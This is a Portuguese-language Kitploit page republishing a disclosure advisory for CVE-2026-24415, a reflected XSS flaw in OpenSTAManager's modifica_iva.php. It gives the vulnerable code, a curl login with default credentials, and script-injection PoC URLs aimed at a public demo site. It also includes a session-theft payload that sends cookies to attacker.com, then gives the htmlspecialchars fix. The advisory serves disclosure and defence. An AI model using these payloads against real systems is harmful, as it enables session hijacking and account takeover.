Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24415 — CVE-2026-24415 - OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter | Kitploit
Ferramentas/GitHubGitHub/lukasz-rybak/cve-2026-24415
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHublukasz-rybak/cve-2026-24415

CVE-2026-24415

CVE-2026-24415 - OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24415: OpenSTAManager Afetado por XSS em modifica_iva.php via parâmetro righe

Visão Geral

CampoDetalhes
ID do CVECVE-2026-24415
SeveridadeMÉDIA
AvisoVer Aviso
Descoberto porLukasz Rybak

Produtos Afetados

  • devcode-it/openstamanager (versões: < 2.9.8)

Classificação CWE

  • CWE-79: Neutralização Inadequada de Entrada Durante Geração de Página Web ('Cross-site Scripting')

Detalhes

Resumo

Múltiplas vulnerabilidades de Cross-Site Scripting Refletido (XSS) no OpenSTAManager v2.9.8 permitem que atacantes não autenticados executem código JavaScript arbitrário no contexto dos navegadores de outros usuários através de parâmetros de URL manipulados, potencialmente levando ao sequestro de sessão, roubo de credenciais e ações não autorizadas.

Parâmetro Vulnerável: righe (GET)

Detalhes

O OpenSTAManager v2.9.8 contém múltiplas vulnerabilidades de XSS Refletido em modais de modificação de faturas/pedidos/contratos. A aplicação falha em sanitizar adequadamente a entrada fornecida pelo usuário a partir do parâmetro GET righe antes de refleti-la na saída HTML.

Localização do Código Vulnerável: Arquivo: /modules/contratti/modals/modifica_iva.php (Linha 125)

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">

O parâmetro $_GET['righe'] é diretamente ecoado no atributo HTML value sem qualquer sanitização usando htmlspecialchars() ou funções equivalentes. Isso permite que um atacante saia do contexto do atributo e injete HTML/JavaScript arbitrário.

Todos os Arquivos Afetados:

  1. /modules/contratti/modals/modifica_iva.php - Linha 125, Linha 167
  2. /modules/preventivi/modals/modifica_iva.php - Linha 125, Linha 167
  3. /modules/fatture/modals/modifica_iva.php - Linha 121, Linha 161
  4. /modules/ddt/modals/modifica_iva.php - Linha 125, Linha 167
  5. /modules/ordini/modals/modifica_iva.php - Linha 125, Linha 167
  6. /modules/interventi/modals/modifica_iva.php - Linha 125, Linha 167

PoC

Pré-requisitos:

  • Instância em execução do OpenSTAManager v2.9.8
  • Credenciais de administrador válidas (usuário: admin, senha: admin para instância de teste)

Passo 1: Login

root@kitploit:~
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Passo 2: Disparar XSS Navegue para a seguinte URL em um navegador (ou use curl com cookies):

root@kitploit:~
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>

URLs Testadas (Todas vulneráveis):

  • https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>

Resultado Esperado: Popup de alerta JavaScript exibe mostrando o cookie de sessão atual, confirmando a execução do código.

Saída HTML (verificada em instância ao vivo):

root@kitploit:~
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">

Verificação:

image image

Payloads Alternativos: Roubo de sessão: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>

Impacto

Usuários Afetados: Todos os usuários autenticados com acesso aos módulos de contratos, faturas, cotações ou pedidos.

Cenário de Ataque:

  1. O atacante cria uma URL maliciosa com payload XSS
  2. O atacante envia a URL para a vítima via email/chat/phishing
  3. A vítima (usuário autenticado) clica no link
  4. JavaScript malicioso é executado no contexto do navegador da vítima
  5. O atacante pode:
    • Roubar cookies de sessão → Assunção total da conta
    • Realizar ações em nome da vítima (criar/modificar/excluir registros)
    • Roubar tokens CSRF e contornar a proteção CSRF
    • Redirecionar para página de phishing
    • Injetar keylogger para capturar dados sensíveis
    • Modificar o conteúdo da página para enganar o usuário e revelar credenciais

Correção Recomendada:

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">

Aplique esta correção a todos os arquivos afetados listados na seção Detalhes.

Referências

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24415
  • https://github.com/advisories/GHSA-jfgp-g7x7-j25j

Aviso Legal

Este CVE foi divulgado de forma responsável seguindo práticas coordenadas de divulgação de vulnerabilidades. As informações fornecidas aqui são apenas para fins educacionais e defensivos.

Baixar ferramenta